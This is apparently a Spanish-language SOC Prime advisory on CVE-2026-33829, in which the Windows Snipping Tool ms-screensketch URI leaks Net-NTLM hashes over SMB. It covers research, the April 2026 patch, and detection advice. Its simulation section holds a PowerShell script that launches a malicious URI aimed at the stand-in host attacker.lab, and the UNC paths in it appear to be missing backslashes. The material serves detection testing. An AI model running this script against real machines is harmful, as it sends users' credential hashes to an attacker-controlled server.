SOC Prime Bias: Crítico

21 Apr 2026 15:30 UTC

CVE-2026-33829: Fuga de NTLM en Snipping Tool

Author Photo
SOC Prime Team linkedin icon Seguir
CVE-2026-33829: Fuga de NTLM en Snipping Tool
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumen

Una vulnerabilidad en la herramienta de recortes de Windows puede exponer hashes Net-NTLM del usuario actualmente conectado a un atacante remoto. El problema se desencadena a través de un enlace profundo malicioso que abusa del ms-screensketch esquema URI, causando que la herramienta de recortes abra un archivo alojado en un recurso compartido SMB controlado por el atacante. Aunque la víctima debe hacer clic o abrir el enlace diseñado, la filtración de credenciales en sí ocurre silenciosamente en segundo plano cuando Windows inicia la conexión SMB. Este comportamiento puede dar a los atacantes acceso a datos de desafío-respuesta NTLM sin ninguna advertencia visible para el usuario.

Investigación

Los investigadores encontraron que el ms-screensketch protocolo acepta un filePath parámetro y no restringe adecuadamente rutas UNC arbitrarias. Cuando la herramienta de recortes intenta acceder a dicha ruta, Windows intenta automáticamente autenticarse con el servidor SMB remoto, exponiendo la respuesta NTLM en el proceso. Para validar el problema, los investigadores construyeron scripts de prueba de concepto que lanzaron un monitor SMB y generaron un URI malicioso capaz de capturar el hash filtrado.

Mitigación

Microsoft lanzó una actualización de seguridad el 14 de abril de 2026 para abordar el problema eliminando el comportamiento de enlace profundo vulnerable de la herramienta de recortes. Aplicar este parche evita que la aplicación abra automáticamente rutas SMB proporcionadas por el atacante a través de URIs no confiables. Las organizaciones deben priorizar el despliegue de la actualización en sistemas Windows afectados para eliminar la exposición.

Respuesta

Los defensores deben monitorear intentos de invocar el ms-screensketch esquema URI y observar conexiones SMB salientes a hosts internos o externos inusuales. Los sistemas que no requieren la herramienta de recortes deben tener el protocolo restringido donde sea posible, y el despliegue del parche debe ser forzado sin demora. Cualquier hash NTLM expuesto debe ser investigado prontamente por signos de repetición, retransmisión u otro abuso posterior.

Flujo de Ataque

Ejecución de Simulación

Prerrequisito: La Verificación Previa de Telemetría y Línea de Base debe haber pasado.

Razonamiento: Esta sección detalla la ejecución precisa de la técnica del adversario (TTP) diseñada para activar la regla de detección. Los comandos y la narrativa DEBEN reflejar directamente las TTPs identificadas y apuntar a generar la telemetría exacta esperada por la lógica de detección.

  • Narrativa de Ataque y Comandos:

    Un atacante ha obtenido un punto de apoyo en el puesto de trabajo de la víctima y desea recolectar hashes NTLM sin despertar sospechas. Aprovechando CVE-2026-33829, el atacante crea un URI ms-screensketch: que apunta a un recurso compartido SMB controlado por el atacante (attacker.labsharepayload.png). Cuando la herramienta de recortes procesa este URI, Windows inicia automáticamente una conexión SMB al servidor remoto, filtrando la respuesta NTLM de la máquina. El atacante ejecuta el URI a través de PowerShell para asegurar que la herramienta de recortes se invoque en el contexto del usuario.

  • Script de Prueba de Regresión:

    # Filtración NTLM a través de la herramienta de recortes – script de activación
    # Ajuste la ruta UNC para apuntar a su monitor controlado.
    $attackerServer = "attacker.lab"
    $sharePath      = "sharepayload.png"
    $uri = "ms-screensketch:edit?filePath=\$attackerServer$sharePath"
    
    Write-Host "Invocando la herramienta de recortes con URI malicioso..."
    Start-Process $uri
    
    # Espere unos segundos para que se complete el protocolo SMB
    Start-Sleep -Seconds 5
    
    Write-Host "Invocación completa. Compruebe el SIEM para EventID 3 con DestinationHostname que contenga '$attackerServer'."
  • Comandos de Limpieza:

    # Eliminar cualquier proceso residual de la herramienta de recortes (si todavía está ejecutándose)
    Get-Process -Name "SnippingTool","SnippingTool.exe","ScreenSketch","ScreenSketch.exe" -ErrorAction SilentlyContinue |
      Stop-Process -Force
    
    # Opcional: eliminar archivos temporales creados en el lado del atacante (si hay alguno)
    # (Asume que tiene acceso de escritura al recurso compartido)
    # Remove-Item -Path "$attackerServer$sharePath" -Force